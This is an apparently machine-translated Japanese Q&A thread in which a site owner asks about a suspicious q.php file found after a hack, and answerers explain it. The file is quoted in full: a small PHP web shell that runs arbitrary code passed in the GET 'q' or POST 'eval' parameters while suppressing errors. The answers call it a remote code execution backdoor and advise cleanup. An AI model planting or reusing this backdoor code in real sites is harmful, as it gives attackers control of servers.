自分のウェブサイトの1つに登場したq.phpというファイルがあります。サイトはハッキングされています。誰がファイルの内容を知っていますか?ハックしたウェブサイトの異常なPHPファイル
<? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
それは誰もがGETリクエスト、またはPOSTリクエストの「evalの」のparamで任意のコードで「Q」のパラメータとして渡されるPHPコードを実行することができますように見えます。関連するすべてのエラーを抑制します。
これは悪いことですが、サイトが既に停止していない場合は、オフラインにしてサーバーを非常に詳しく監査することをおすすめします。
?q = GET引数またはPOST eval引数で送信されたPHPコードを実行します。
私はあなたのサーバーをクリーンアップし、クリーンインストールからもう一度やり直すことをお勧めします。
これにより、攻撃者は任意のコードを実行できます。
URLに?q=codeでコードを渡すか、evalパラメータにPOST-Requestに挿入すると、スクリプトが実行されます。
これは基本的にリモートコード実行バックドアです。
ニース。最初の行が何であるかはわかりませんが、2つのeval行は、誰かがあなたのサーバー上でそれらをurlまたはpostデータにそれぞれ渡して、それらのコードを実行できるようにします。
大きな問題は、攻撃者が最初にファイルをどのようにアップロードできるかということです。そのファイルには、攻撃者が無断でサーバー上でコードを実行できるように挿入されたコードがあります。
このファイルと不正なコードを含む他のファイルを削除するだけでは問題が解決されないため、攻撃者はファイルをWebサイトのファイルリポジトリにアップロードできます。いずれにしても
は、ここで完全な破壊である:
1 /のerror_reporting(0)。 エラー報告をオフに設定します。
2/if(@ $ _ GET ['wpth']){echo "./mywebsite.co.uk/index.htm"; }?> 最後に/?wpthを付けてURLを呼び出すと、ページの上部にURLがエコーされます。
3/ これは、qの値に含まれるすべてのコードを実行します。すなわちyourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4 /(ISSET($ _ POST [ 'のeval']!))であれば{ダイス( '');} キルページの実行の場合evalと呼ばれるポストフォーム変数は設定されません。
5/eval($ _ POST ['eval']); フォーム変数がeval
と呼ばれる、リモートホストされたフォームから転記されたコードを実行します(追加アップロードなしで、明らかにすでに可能なこともあります)。 – mario